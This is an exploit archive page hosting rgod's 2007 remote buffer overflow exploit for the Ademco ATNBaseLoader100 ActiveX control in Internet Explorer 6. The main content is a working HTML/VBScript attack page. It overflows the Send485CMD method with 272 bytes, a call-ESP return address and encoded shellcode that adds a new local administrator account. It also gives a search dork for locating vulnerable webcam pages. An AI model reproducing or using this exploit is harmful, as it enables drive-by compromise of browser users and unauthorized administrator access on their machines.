ie6ademco-overflow.txt

ie6ademco-overflow.txt: Posted May 31, 2007; Authored by rgod | Site retrogod.altervista.org; Internet Explorer 6 / Ademco, co., ltd. ATNBaseLoad100 module remote buffer overflow exploit.; tags | exploit, remote, overflow; SHA-256 | cc172dca81fb7d641e2ef31d86eca200033d53f260d74a5994cc178ce9925bf3; Download | Favorite | View

ie6ademco-overflow.txt

!--
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
remote buffer overflow exploit / XP SP2 it version
by rgod
site: retrogod.altervista.org

this activex is installed browsing some webcam pages
try this google dork:

intitle:"Browser Launch Page"
(dork credit: dragg, found in GHDB)

object safety report:

RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False

here it is what happen, EIP is overwritten after 272 chars passed to
Send485CMD method:

EAX 00000001
ECX 0013EA7C ASCII "AAAA ...
EDX 7EFF00E4
EBX 10007414
ESP 0013EB98 ASCII "AAAA ...
EBP 41414141
ESI 0018022C
EDI 00000000
EIP 41414141

SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable
to less convenient overflows or seh overwrite
-->
<HTML>
<OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT>
<script language='vbscript'>

'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
NOP= String(12, unescape("%90"))
EIP= unescape("%03%78%41%7e") 'call ESP user32.dll

SunTzu=String(272, "A") + EIP + NOP + SCODE

BaseRunner.Send485CMD SunTzu

</script>
</HTML>

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

ie6ademco-overflow.txt

ie6ademco-overflow.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ie6ademco-overflow.txt

Share This

ie6ademco-overflow.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems